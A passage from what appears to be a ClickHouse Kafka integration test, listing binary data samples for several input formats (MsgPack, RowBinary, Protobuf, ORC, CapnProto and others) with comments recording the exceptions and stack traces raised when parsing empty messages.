# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
